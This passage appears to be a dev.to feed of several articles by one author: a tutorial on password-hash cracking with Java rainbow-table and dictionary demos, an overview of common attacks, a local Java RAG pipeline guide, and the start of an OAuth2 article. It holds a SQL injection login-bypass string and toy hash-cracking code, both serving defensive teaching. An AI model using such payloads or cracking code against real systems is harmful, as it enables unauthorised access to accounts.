hashed, attacker can still:</p> <ul> <li>Hash guesses</li> <li>Compare results</li> </ul> <h4> 3.3 Rainbow Table Attack (Precomputation) </h4> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">com.auth</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.security.MessageDigest</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.util.HashMap</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.util.Map</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">RainbowTableDemo</span> <span class="o">{</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">hash</span><span class="o">(</span><span class="nc">String</span> <span class="n">input</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">MessageDigest</span> <span class="n">md</span> <span class="o">=</span> <span class="nc">MessageDigest</span><span class="o">.</span><span class="na">getInstance</span><span class="o">(</span><span class="s">"MD5"</span><span class="o">);</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">digest</span> <span class="o">=</span> <span class="n">md</span><span class="o">.</span><span class="na">digest</span><span class="o">(</span><span class="n">input</span><span class="o">.</span><span class="na">getBytes</span><span class="o">());</span> <span class="nc">StringBuilder</span> <span class="n">hex</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">StringBuilder</span><span class="o">();</span> <span class="k">for</span> <span class="o">(</span><span class="kt">byte</span> <span class="n">b</span> <span class="o">:</span> <span class="n">digest</span><span class="o">)</span> <span class="o">{</span> <span class="n">hex</span><span class="o">.</span><span class="na">append</span><span class="o">(</span><span class="nc">String</span><span class="o">.</span><span class="na">format</span><span class="o">(</span><span class="s">"%02x"</span><span class="o">,</span> <span class="n">b</span><span class="o">));</span> <span class="o">}</span> <span class="k">return</span> <span class="n">hex</span><span class="o">.</span><span class="na">toString</span><span class="o">();</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">main</span><span class="o">(</span><span class="nc">String</span><span class="o">[]</span> <span class="n">args</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">passwords</span> <span class="o">=</span> <span class="o">{</span><span class="s">"123456"</span><span class="o">,</span> <span class="s">"password"</span><span class="o">,</span> <span class="s">"admin"</span><span class="o">};</span> <span class="nc">Map</span><span class="o">&lt;</span><span class="nc">String</span><span class="o">,</span> <span class="nc">String</span><span class="o">&gt;</span> <span class="n">table</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">HashMap</span><span class="o">&lt;&gt;();</span> <span class="k">for</span> <span class="o">(</span><span class="nc">String</span> <span class="n">pwd</span> <span class="o">:</span> <span class="n">passwords</span><span class="o">)</span> <span class="o">{</span> <span class="n">table</span><span class="o">.</span><span class="na">put</span><span class="o">(</span><span class="n">hash</span><span class="o">(</span><span class="n">pwd</span><span class="o">),</span> <span class="n">pwd</span><span class="o">);</span> <span class="o">}</span> <span class="nc">String</span> <span class="n">stolenHash</span> <span class="o">=</span> <span class="n">hash</span><span class="o">(</span><span class="s">"password"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">table</span><span class="o">.</span><span class="na">containsKey</span><span class="o">(</span><span class="n">stolenHash</span><span class="o">))</span> <span class="o">{</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"==&gt; Instantly cracked: "</span> <span class="o">+</span> <span class="n">table</span><span class="o">.</span><span class="na">get</span><span class="o">(</span><span class="n">stolenHash</span><span class="o">));</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>👉 No guessing needed — just lookup.</p> <h3> 🛡️ 4. Why SALT Changes Everything </h3> <h4> 4.1 Why SALT is Needed </h4> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb7mu7k7wc8jcya3fegjn.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb7mu7k7wc8jcya3fegjn.jpg" alt=" " width="800" height="336"></a><br> Problem:<br> <code>password → same hash everywhere</code><br> Solution:<br> <code>hash(password + salt)</code><br> 👉 Makes each hash unique<br> 4.2 SALT Implementation (Java)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">com.auth</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.security.MessageDigest</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.security.SecureRandom</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.util.Base64</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">SaltedHashDemo</span> <span class="o">{</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">generateSalt</span><span class="o">()</span> <span class="o">{</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">salt</span> <span class="o">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="o">[</span><span class="mi">16</span><span class="o">];</span> <span class="k">new</span> <span class="nf">SecureRandom</span><span class="o">().</span><span class="na">nextBytes</span><span class="o">(</span><span class="n">salt</span><span class="o">);</span> <span class="k">return</span> <span class="nc">Base64</span><span class="o">.</span><span class="na">getEncoder</span><span class="o">().</span><span class="na">encodeToString</span><span class="o">(</span><span class="n">salt</span><span class="o">);</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">hash</span><span class="o">(</span><span class="nc">String</span> <span class="n">password</span><span class="o">,</span> <span class="nc">String</span> <span class="n">salt</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">MessageDigest</span> <span class="n">md</span> <span class="o">=</span> <span class="nc">MessageDigest</span><span class="o">.</span><span class="na">getInstance</span><span class="o">(</span><span class="s">"SHA-256"</span><span class="o">);</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">digest</span> <span class="o">=</span> <span class="n">md</span><span class="o">.</span><span class="na">digest</span><span class="o">((</span><span class="n">password</span> <span class="o">+</span> <span class="n">salt</span><span class="o">).</span><span class="na">getBytes</span><span class="o">());</span> <span class="nc">StringBuilder</span> <span class="n">hex</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">StringBuilder</span><span class="o">();</span> <span class="k">for</span> <span class="o">(</span><span class="kt">byte</span> <span class="n">b</span> <span class="o">:</span> <span class="n">digest</span><span class="o">)</span> <span class="o">{</span> <span class="n">hex</span><span class="o">.</span><span class="na">append</span><span class="o">(</span><span class="nc">String</span><span class="o">.</span><span class="na">format</span><span class="o">(</span><span class="s">"%02x"</span><span class="o">,</span> <span class="n">b</span><span class="o">));</span> <span class="o">}</span> <span class="k">return</span> <span class="n">hex</span><span class="o">.</span><span class="na">toString</span><span class="o">();</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">main</span><span class="o">(</span><span class="nc">String</span><span class="o">[]</span> <span class="n">args</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">password</span> <span class="o">=</span> <span class="s">"password"</span><span class="o">;</span> <span class="nc">String</span> <span class="n">salt</span> <span class="o">=</span> <span class="n">generateSalt</span><span class="o">();</span> <span class="nc">String</span> <span class="n">hashed</span> <span class="o">=</span> <span class="n">hash</span><span class="o">(</span><span class="n">password</span><span class="o">,</span> <span class="n">salt</span><span class="o">);</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"Salt: "</span> <span class="o">+</span> <span class="n">salt</span><span class="o">);</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"Hash: "</span> <span class="o">+</span> <span class="n">hashed</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <h4> 4.3 How SALT Breaks Rainbow Attacks </h4> <p><code>password + salt1 → hash1<br> password + salt2 → hash2</code></p> <p>👉 Same password ≠ same hash<br> 👉 Rainbow tables become useless</p> <h3> 🔴 5. Attacker vs SALT </h3> <h4> 5.1 Attacking Salted Hashes (Java) </h4> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="kn">package</span> <span class="nn">com.auth</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.security.MessageDigest</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">SaltedAttackDemo</span> <span class="o">{</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">hash</span><span class="o">(</span><span class="nc">String</span> <span class="n">password</span><span class="o">,</span> <span class="nc">String</span> <span class="n">salt</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">MessageDigest</span> <span class="n">md</span> <span class="o">=</span> <span class="nc">MessageDigest</span><span class="o">.</span><span class="na">getInstance</span><span class="o">(</span><span class="s">"SHA-256"</span><span class="o">);</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">digest</span> <span class="o">=</span> <span class="n">md</span><span class="o">.</span><span class="na">digest</span><span class="o">((</span><span class="n">password</span> <span class="o">+</span> <span class="n">salt</span><span class="o">).</span><span class="na">getBytes</span><span class="o">());</span> <span class="nc">StringBuilder</span> <span class="n">hex</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">StringBuilder</span><span class="o">();</span> <span class="k">for</span> <span class="o">(</span><span class="kt">byte</span> <span class="n">b</span> <span class="o">:</span> <span class="n">digest</span><span class="o">)</span> <span class="o">{</span> <span class="n">hex</span><span class="o">.</span><span class="na">append</span><span class="o">(</span><span class="nc">String</span><span class="o">.</span><span class="na">format</span><span class="o">(</span><span class="s">"%02x"</span><span class="o">,</span> <span class="n">b</span><span class="o">));</span> <span class="o">}</span> <span class="k">return</span> <span class="n">hex</span><span class="o">.</span><span class="na">toString</span><span class="o">();</span> <span class="o">}</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">main</span><span class="o">(</span><span class="nc">String</span><span class="o">[]</span> <span class="n">args</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="nc">String</span> <span class="n">salt</span> <span class="o">=</span> <span class="s">"randomSalt123"</span><span class="o">;</span> <span class="nc">String</span> <span class="n">storedHash</span> <span class="o">=</span> <span class="n">hash</span><span class="o">(</span><span class="s">"password"</span><span class="o">,</span> <span class="n">salt</span><span class="o">);</span> <span class="nc">String</span><span class="o">[]</span> <span class="n">dictionary</span> <span class="o">=</span> <span class="o">{</span><span class="s">"123456"</span><span class="o">,</span> <span class="s">"password"</span><span class="o">,</span> <span class="s">"admin"</span><span class="o">};</span> <span class="k">for</span> <span class="o">(</span><span class="nc">String</span> <span class="n">guess</span> <span class="o">:</span> <span class="n">dictionary</span><span class="o">)</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span><span class="n">hash</span><span class="o">(</span><span class="n">guess</span><span class="o">,</span> <span class="n">salt</span><span class="o">).</span><span class="na">equals</span><span class="o">(</span><span class="n">storedHash</span><span class="o">))</span> <span class="o">{</span> <span class="nc">System</span><span class="o">.</span><span class="na">out</span><span class="o">.</span><span class="na">println</span><span class="o">(</span><span class="s">"==&gt; Cracked even with salt: "</span> <span class="o">+</span> <span class="n">guess</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>👉 Salt does NOT stop guessing — only slows it down.</p> <h4> 5.2 Cost Explosion </h4> <p>Without salt:<br> <code>1M guesses → cracks many users</code><br> With salt:<br> <code>1M users × 1M guesses = 1 trillion operations</code></p> <h4> Source Code </h4> <p>All source files are available on GitHub:<br> <a href="https://github.com/knowledgebase21st/Software-Engineering/tree/dev/security/attacks/authentication/com/auth" rel="noopener noreferrer">Github source codes</a></p> <p>👉 This is where salt becomes powerful.</p> <h3> ⚠️ 6. What SALT Does NOT Solve </h3> <ul> <li>Weak passwords (still crackable)</li> <li>Fast hashing (SHA-256 is too fast)</li> <li>GPU-based attacks</li> </ul> <p>👉 SALT makes attacks harder—but not impossible.<br> Attackers can still:</p> <ul> <li>Perform brute force attacks</li> <li>Use GPUs to compute hashes at scale</li> <li>Target weak passwords</li> </ul> <p>This is why modern systems go beyond</p> <p>🚀 Final Defense: Modern Password Hashing<br> Use:</p> <ul> <li><a href="https://en.wikipedia.org/wiki/Bcrypt" rel="noopener noreferrer">bcrypt</a></li> <li><a href="https://en.wikipedia.org/wiki/Argon2" rel="noopener noreferrer">Argon2</a></li> </ul> <p>Why:</p> <ul> <li>Built-in salt</li> <li>Slow hashing (costly per attempt)</li> <li>Resistant to GPU attacks</li> </ul> <h3> 🧠 7.Conclusion </h3> <p>Authentication security evolves like this:<br> <code>Plain text → completely broken<br> Hash only → still vulnerable<br> Salted hash → better<br> Salt + slow hashing → strong defense</code></p> <p>👉 Security is not about making attacks impossible,<br> 👉 It’s about making them economically infeasible.</p> <h3> 💡 8.Final Thought </h3> <p>Think like an attacker:</p> <ul> <li>Can I guess this password?</li> <li>Can I reuse work?</li> <li>Can I scale this attack?</li> </ul> <p>Good security doesn’t make attacks impossible—it makes them impractical.</p> <p>As a developer, your goal isn’t to stop attackers completely, but to ensure that breaking your system is simply not worth the effort.</p> cybersecurity java security tutorial Understanding Common Cybersecurity Attacks: A Practical Overview Sanjay Ghosh Tue, 14 Apr 2026 18:10:37 +0000 https://dev.to/sanjayghosh/understanding-common-cybersecurity-attacks-a-practical-overview-2mea https://dev.to/sanjayghosh/understanding-common-cybersecurity-attacks-a-practical-overview-2mea <p>Modern applications are more powerful and interconnected than ever—but with that power comes increased exposure to security risks. Whether you're building a small backend service or a large distributed system, <strong>security is no longer optional</strong>.</p> <p>Before diving into specific vulnerabilities, it’s important to understand <strong>why cybersecurity matters</strong> and how common attacks are structured.</p> <h3> Why Cybersecurity Matters in Modern Applications </h3> <h4> 🔐 Data Protection &amp; Privacy </h4> <p>Modern applications handle large amounts of sensitive data—personally identifiable information (PII), financial records, and intellectual property. This makes them prime targets for attackers.</p> <h4> 🏢 Maintaining Trust &amp; Reputation </h4> <p>Users trust applications with their personal and financial data. A single breach can damage reputation, erode customer trust, and lead to significant financial loss.</p> <h4> ⚖️ Regulatory Compliance </h4> <p>Organizations must comply with regulations such as GDPR and industry standards. Failing to do so can result in heavy fines and legal consequences.</p> <h4> ⚙️ System Integrity &amp; Availability </h4> <p>Security controls such as encryption and access management ensure that systems remain reliable, tamper-proof, and available—even under attack.</p> <h4> 🚀 Defending Against Sophisticated Threats </h4> <p>As technologies like cloud computing and AI evolve, so do attack techniques—ransomware, phishing, and zero-day exploits are becoming more advanced.</p> <h4> 🌐 Protecting Interconnected Systems </h4> <p>Modern systems rely heavily on APIs, microservices, and IoT devices. A vulnerability in one component can compromise the entire ecosystem.</p> <h3> The Role of OWASP (Open Worldwide Application Security Project) </h3> <p>Learn more: <a href="https://owasp.org/" rel="noopener noreferrer">https://owasp.org/</a><br> When discussing application security, it’s hard to ignore OWASP.</p> <p>OWASP is a nonprofit foundation that provides open-source resources, tools, and best practices to help developers build secure applications.</p> <p>One of its most well-known contributions is the OWASP Top 10, which highlights the most critical web security risks.</p> <h3> OWASP Top 10 (2025) </h3> <p>Full list: <a href="https://owasp.org/Top10/2025/" rel="noopener noreferrer">https://owasp.org/Top10/2025/</a></p> <ul> <li>A01: Broken Access Control</li> <li>A02: Security Misconfiguration</li> <li>A03: Software Supply Chain Failures</li> <li>A04: Cryptographic Failures</li> <li>A05: Injection</li> <li>A06: Insecure Design</li> <li>A07: Authentication Failures</li> <li>A08: Software or Data Integrity Failures</li> <li>A09: Security Logging and Alerting Failures</li> <li>A10: Mishandling of Exceptional Conditions</li> </ul> <p>These categories are widely used as a baseline for secure application design.</p> <h3> A Simple Classification of Cybersecurity Attacks </h3> <p>To make sense of the landscape, we can group common attacks into four practical categories:</p> <ul> <li>Web Attacks</li> <li>Authentication Attacks</li> <li>Network Attacks</li> <li>Human (Social Engineering) Attacks</li> </ul> <p>Some threats span multiple areas, so we’ll also note a few cross-category cases.</p> <h3> 🌐 Web Attacks (Application Layer) </h3> <p>These target application logic, APIs, and user input handling.</p> <ul> <li> <p>Injection Attacks (SQL, Command, LDAP)</p> <p>→ Example: ' OR 1=1 -- login bypass</p> </li> <li> <p>Cross-Site Scripting (XSS)</p> <p>→ Injecting malicious JavaScript into web pages</p> </li> <li> <p>Cross-Site Request Forgery (CSRF)</p> <p>→ Forcing a logged-in user to perform unintended actions</p> </li> <li> <p>Broken Access Control</p> <p>→ Accessing unauthorized data (e.g., changing /user/123 to /user/124)</p> </li> <li> <p>Security Misconfiguration</p> <p>→ Default credentials, open ports, debug settings</p> </li> <li> <p>Insecure Deserialization</p> <p>→ Executing malicious code via manipulated serialized objects</p> </li> </ul> <h3> 🔑 Authentication Attacks </h3> <p>These focus on compromising login systems and user identities.</p> <ul> <li>Brute Force / Dictionary Attacks</li> <li>Session Hijacking / Fixation</li> <li>Rainbow Table Attacks (password hash cracking technique)</li> </ul> <h3> 🧠 Network Attacks </h3> <p>These target communication between systems.</p> <ul> <li> <p>Man-in-the-Middle (MITM)</p> <p>→ Intercepting data in transit</p> </li> <li><p>Denial of Service (DoS / DDoS)<br> → Overwhelming systems to make them unavailable</p></li> </ul> <h3> 🧑‍💻 Human Attacks (Social Engineering) </h3> <p>These exploit human behavior rather than systems.</p> <ul> <li> <p>Phishing (Email, SMS, Voice)</p> <p>→ Trick users into revealing sensitive data<br> 💡 These are among the most successful real-world attacks.</p> </li> </ul> <h3> 🔄 Cross-Category / Special Cases </h3> <p>Some threats don’t fit neatly into one category:</p> <ul> <li>Malware (virus, ransomware, spyware)</li> <li>Zero-day exploits (attacks on unknown vulnerabilities) These can impact multiple layers—from applications to networks to users.</li> </ul> <h3> A Quick Example: How Vulnerabilities Start in Code </h3> <p>At this point, you might be wondering:<br> “These attacks sound serious—but how do they relate to the code we write every day?”</p> <p>Let’s look at a simple backend example that illustrates how easily security vulnerabilities can be introduced.</p> <p>This example focuses on password handling, but the same principle applies across all categories—small implementation choices can introduce major vulnerabilities.</p> <p>Security vulnerabilities are often not caused by complex systems—but by small, overlooked decisions in everyday code.</p> <p>❌ Insecure Approach: Plain Text Storage<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="nc">String</span> <span class="n">password</span> <span class="o">=</span> <span class="s">"admin123"</span><span class="o">;</span> <span class="nc">String</span> <span class="n">stored</span> <span class="o">=</span> <span class="n">password</span><span class="o">;</span> <span class="c1">// storing plain text ❌</span> </code></pre> </div> <p>If a database is compromised, attackers immediately gain access to user passwords.</p> <p>⚠️ Slightly Better: Hashing (But Still Weak)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="nc">MessageDigest</span> <span class="n">md</span> <span class="o">=</span> <span class="nc">MessageDigest</span><span class="o">.</span><span class="na">getInstance</span><span class="o">(</span><span class="s">"SHA-256"</span><span class="o">);</span> <span class="kt">byte</span><span class="o">[]</span> <span class="n">hash</span> <span class="o">=</span> <span class="n">md</span><span class="o">.</span><span class="na">digest</span><span class="o">(</span><span class="n">password</span><span class="o">.</span><span class="na">getBytes</span><span class="o">());</span> </code></pre> </div> <p>Hashing improves security, but it’s still vulnerable to precomputed attacks (like rainbow tables).</p> <p>✅ Better Approach (Conceptual)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="nc">String</span> <span class="n">saltedPassword</span> <span class="o">=</span> <span class="n">password</span> <span class="o">+</span> <span class="n">randomSalt</span><span class="o">;</span> </code></pre> </div> <p>Adding randomness makes attacks significantly harder.</p> <p>We’ll explore why this matters in detail when we dive into authentication attacks in the next article.</p> <p>Final Thoughts</p> <p>Cybersecurity isn’t just about preventing attacks—it’s about building systems that are resilient by design.</p> <p>As we’ve seen:</p> <ul> <li>Attacks can target applications, networks, and even people</li> <li>Many vulnerabilities originate from small design or coding decisions</li> <li>Understanding attack patterns is the first step toward preventing them</li> </ul> <p>What’s Next?<br> In the next article, we’ll take a deeper look at authentication attacks, including:</p> <ul> <li>How attackers crack passwords</li> <li>What rainbow table attacks are</li> <li>Why techniques like salting are critical</li> </ul> cybersecurity security webdev java Build a RAG Pipeline in Java (Text Vector LLM, No Paid APIs) Sanjay Ghosh Wed, 01 Apr 2026 23:23:34 +0000 https://dev.to/sanjayghosh/build-a-rag-pipeline-in-java-text-vector-llm-no-paid-apis-3lc3 https://dev.to/sanjayghosh/build-a-rag-pipeline-in-java-text-vector-llm-no-paid-apis-3lc3 <p>Ever asked an LLM a question about your own data and received an incorrect or generic answer?</p> <p>That’s because Large Language Models (LLMs) don’t know your private data.</p> <p>In this article, we’ll build a complete <strong>Retrieval-Augmented Generation (RAG)</strong> pipeline using:</p> <ul> <li>Java</li> <li>PostgreSQL (with vector support)</li> <li>Ollama (local LLM + embeddings)</li> </ul> <p>👉 No OpenAI / No paid APIs<br> 👉 Fully local<br> 👉 Practical and production-relevant</p> <h3> 🧠 What is RAG? </h3> <p>Retrieval-Augmented Generation (RAG) is an architecture that improves LLM responses by:</p> <p>Retrieving relevant data from a knowledge source<br> Passing that data to the LLM<br> Generating an answer grounded in that context</p> <p>In simple terms:</p> <p>Instead of guessing, the model first looks up relevant information and then answers.</p> <h3> 🔍 Why Do We Need RAG? </h3> <p>LLMs are powerful, but they have limitations:</p> <ul> <li>❌ They don’t know your private/company data</li> <li>❌ Their knowledge is static</li> <li>❌ They can hallucinate</li> </ul> <p>RAG solves this by combining:</p> <ul> <li>Your data (database)</li> <li>Smart retrieval (vector search)</li> <li>LLM reasoning (generation)</li> </ul> <h3> 📊 RAG Flow (This Project) </h3> <p>We will implement this pipeline:<br> Text → Embedding → Store in DB</p> <p>Query → Embedding<br> ↓<br> Vector Search (Top K)<br> ↓<br> Pass to LLM<br> ↓<br> Final Answer</p> <h3> ⚙️ Prerequisites </h3> <h4> 1. Install PostgreSQL </h4> <p>Make sure PostgreSQL is installed and running.</p> <h4> 2. Install Ollama (Local LLM) </h4> <p>sudo apt-get install zstd<br> curl -fsSL <a href="https://ollama.com/install.sh" rel="noopener noreferrer">https://ollama.com/install.sh</a> | sh</p> <h4> 3. Pull Required Models </h4> <p># LLM (for answer generation)<br> ollama pull llama3</p> <p># Embedding model<br> ollama pull nomic-embed-text</p> <h4> 4. Verify Installation </h4> <p>ollama run llama3<br> If it responds, you’re ready.</p> <h3> 🟢 Phase 1: Indexing (Store Data) </h3> <p>In this phase, we:</p> <ol> <li>Convert text → vector (embedding)</li> <li>Store it in PostgreSQL</li> </ol> <h4> Why Embeddings? </h4> <p>Embeddings convert text into numbers so we can measure similarity.<br> Example:<br> <code>"OAuth authentication"<br> → [0.12, -0.98, 0.45, ...]</code></p> <h4> Database Table </h4> <p><code>CREATE TABLE text_embeddings (<br> id SERIAL PRIMARY KEY,<br> content TEXT,<br> embedding VECTOR(768)<br> );</code></p> <h4> Key Class: EmbeddingService.java </h4> <p>Calls Ollama<br> Converts text → vector</p> <p>Snippet<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="nc">ClassicHttpResponse</span> <span class="n">response</span> <span class="o">=</span> <span class="o">(</span><span class="nc">ClassicHttpResponse</span><span class="o">)</span> <span class="nc">Request</span><span class="o">.</span><span class="na">post</span><span class="o">(</span><span class="s">"http://localhost:11434/api/embeddings"</span><span class="o">)</span> <span class="o">.</span><span class="na">bodyString</span><span class="o">(</span><span class="n">body</span><span class="o">.</span><span class="na">toString</span><span class="o">(),</span> <span class="nc">ContentType</span><span class="o">.</span><span class="na">APPLICATION_JSON</span><span class="o">)</span> <span class="o">.</span><span class="na">execute</span><span class="o">()</span> <span class="o">.</span><span class="na">returnResponse</span><span class="o">();</span> </code></pre> </div> <p>This returns a numerical vector representation of the input text, which we store in the database.</p> <h4> Key Class: StorageService.java </h4> <p>Stores text + embedding into PostgreSQL<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code><span class="nc">PreparedStatement</span> <span class="n">ps</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="na">prepareStatement</span><span class="o">(</span> <span class="s">"INSERT INTO text_embeddings (content, embedding) VALUES (?, ?::vector)"</span> <span class="o">);</span> <span class="n">ps</span><span class="o">.</span><span class="na">setString</span><span class="o">(</span><span class="mi">1</span><span class="o">,</span> <span class="n">text</span><span class="o">);</span> <span class="n">ps</span><span class="o">.</span><span class="na">setString</span><span class="o">(</span><span class="mi">2</span><span class="o">,</span> <span class="n">vector</span><span class="o">);</span> <span class="n">ps</span><span class="o">.</span><span class="na">executeUpdate</span><span class="o">();</span> </code></pre> </div> <p>Each piece of text is stored along with its vector representation.</p> <h3> 🔵 Phase 2: Query (RAG Flow) </h3> <h4> Step 1: User Query </h4> <p>"What is OAuth?"</p> <h4> Step 2: Convert Query → Embedding </h4> <p>Same process as storing text.</p> <h4> Step 3: Retrieve Relevant Data </h4> <p>SELECT content<br> FROM text_embeddings<br> ORDER BY embedding &lt;-&gt; ?::vector<br> LIMIT 3;<br> 👉 This finds the most similar text chunks</p> <h4> Key Class: Retriever.java </h4> <p>This is the R (Retrieval) in RAG.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code> <span class="nc">PreparedStatement</span> <span class="n">ps</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="na">prepareStatement</span><span class="o">(</span> <span class="sh">""" SELECT content FROM text_embeddings ORDER BY embedding &lt;-&gt; ?::vector LIMIT ? """</span> <span class="o">);</span> <span class="n">ps</span><span class="o">.</span><span class="na">setString</span><span class="o">(</span><span class="mi">1</span><span class="o">,</span> <span class="n">vector</span><span class="o">);</span> <span class="n">ps</span><span class="o">.</span><span class="na">setInt</span><span class="o">(</span><span class="mi">2</span><span class="o">,</span> <span class="n">topK</span><span class="o">);</span> <span class="nc">ResultSet</span> <span class="n">rs</span> <span class="o">=</span> <span class="n">ps</span><span class="o">.</span><span class="na">executeQuery</span><span class="o">();</span> </code></pre> </div> <h4> Step 4: Generate Answer Using LLM </h4> <p>We pass retrieved data to the LLM:</p> <p>Context:<br> OAuth 2.0 is an authorization framework...</p> <p>Question:<br> What is OAuth?</p> <p>👉 The LLM generates a clean answer.</p> <h4> Key Class: LLMService.java </h4> <p>This is the G (Generation) in RAG.<br> Passing Context to the LLM<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight java"><code> <span class="nc">String</span> <span class="n">prompt</span> <span class="o">=</span> <span class="sh">""" Answer briefly in 2-3 sentences. Context: %s Question: %s """</span><span class="o">.</span><span class="na">formatted</span><span class="o">(</span><span class="n">context</span><span class="o">,</span> <span class="n">query</span><span class="o">);</span> </code></pre> </div> <p>We inject retrieved data into the prompt so the LLM generates grounded answers.</p> <p>🧪 Sample Output<br> --- Retrieved Context ---<br> OAuth 2.0 is an authorization framework.<br> JWT is used for secure authentication.</p> <p>--- Final Answer ---<br> OAuth is an authorization framework used to grant access to resources...<br> 🧠 What’s Really Happening?</p> <p>This is the most important part to understand:</p> <p>Component Role<br> Database Stores knowledge<br> Retriever Finds relevant information<br> LLM Generates answer</p> <p>👉 The LLM does NOT retrieve data<br> 👉 The database does NOT generate answers</p> <h4> 💻 Full Code </h4> <p>The project includes:</p> <ul> <li>EmbeddingService.java</li> <li>StorageService.java</li> <li>Retriever.java</li> <li>LLMService.java</li> <li>RAGApp.java</li> <li>pom.xml</li> </ul> <h4> 👉 GitHub Repository </h4> <p><a href="https://github.com/knowledgebase21st/Software-Engineering/tree/dev/AI/RAG" rel="noopener noreferrer">https://github.com/knowledgebase21st/Software-Engineering/tree/dev/AI/RAG</a></p> <h4> 🚀 Why This Approach is Powerful </h4> <ul> <li>Works with your own data</li> <li>Reduces hallucination</li> <li>Fully offline (with Ollama)</li> <li>Production-ready pattern</li> </ul> <h4> ✅ Conclusion </h4> <p>We built a complete RAG pipeline using Java, PostgreSQL, and Ollama.</p> <p>This approach combines:</p> <ul> <li>Your data</li> <li>Smart retrieval</li> <li>LLM reasoning</li> </ul> <p>Result:<br> <code>Accurate, context-aware answers using your own knowledge base.</code></p> ai machinelearning postgres rag Understanding OAuth2 Flow with a Complete Java Servlet Demo (Step-by-Step) Sanjay Ghosh Wed, 25 Mar 2026 21:30:07 +0000 https://dev.to/sanjayghosh/understanding-oauth2-flow-with-a-complete-java-servlet-demo-step-by-step-3bai https://dev.to/sanjayghosh/understanding-oauth2-flow-with-a-complete-java-servlet-demo-step-by-step-3bai <p>OAuth2 is everywhere.</p> <ul> <li>“Login with Google”</li> <li>“Continue with GitHub”</li> <li>“Sign in with Microsoft”</li> </ul> <p>We use it daily—but when it comes to explaining how it actually works, things quickly get confusing.</p> <p>Most tutorials either:</p> <ul> <li>Explain only the theory ❌</li> <li>Or show isolated code without context ❌</li> </ul> <p>Very few connect the full <strong>flow end-to-end</strong>.</p> <h4> 🎯 What This Article Does Differently </h4> <p>In this article, we will:</p> <ul> <li>Break down the <strong>4 core actors</strong> </li> <li>Walk through the <strong>entire OAuth2 flow</strong> </li> <li>Map each step to <strong>working Java servlet code</strong> </li> <li>Build a <strong>complete runnable demo</strong> </li> </ul> <h4> 🧠 The Key Idea (Read This First) </h4> <p>OAuth2 is <strong>not about 